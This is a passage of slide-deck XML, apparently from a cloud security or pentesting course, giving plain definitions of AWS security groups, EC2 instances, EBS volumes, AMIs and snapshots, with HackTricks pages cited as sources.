                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>Groups</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p13"/>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92" name="Google Shape;92;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641200" y="1129050"/>
            <a:ext cx="8001000" cy="985200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-311150" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt2"/>
              </a:buClr>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Security Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Security groups are a virtual firewall that control inbound and outbound network traffic to instances in a VPC.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-311150" algn="l" rtl="0">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Relation M to M instances (usually 1 to 1).</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93" name="Google Shape;93;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="701600" y="2272363"/>
            <a:ext cx="7075876" cy="1072675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="Google Shape;94;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="701600" y="3474775"/>
            <a:ext cx="7880200" cy="1102109"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828550" y="4711325"/>
            <a:ext cx="7366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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information</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9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9.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s">
                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>EC2 - Instances/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>Volumes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:latin typeface="Raleway ExtraBold"/>
                <a:ea typeface="Raleway ExtraBold"/>
                <a:cs typeface="Raleway ExtraBold"/>
                <a:sym typeface="Raleway ExtraBold"/>
              </a:rPr>
              <a:t>AMIs/Snapshots</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;101;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983200" y="2069950"/>
            <a:ext cx="401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02" name="Google Shape;102;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489075" y="1017725"/>
            <a:ext cx="8001000" cy="39804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lt2"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: This is the working virtual machine</a:t>
            </a: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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Volume</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: A disk containing information. An instance need to have at least 1 volume but it can have more.</a:t>
            </a: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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>AMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: An Amazon Machine Image (AMI) is a pre-configured virtual machine image, used to create an instance in the Amazon Web Services (AWS) Elastic Compute Cloud (EC2).</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115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You can generate an AMI from an Instance</a:t>
            </a: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Char char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Snapshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: An Amazon Elastic Compute Cloud (EC2) Snapshot is a point-in-time copy of an Amazon Elastic Block Store (EBS) volume. A snapshot is a useful tool for backing up data stored on an EBS volume, and for migrating data between EC2 instances or between AWS regions.</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200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>differences between an AMI and a Snapshot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: an AMI is used to launch an EC2 instance, while an EC2 Snapshot is used to back up and recover data stored on an EBS volume. While an EC2 Snapshot can be used to create a new AMI, it is not the same thing as an AMI, and it does not include information about the operating system, application server, or other software required to run an application.</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lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4835900"/>
            <a:ext cx="73845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s" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum#ebs</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="104"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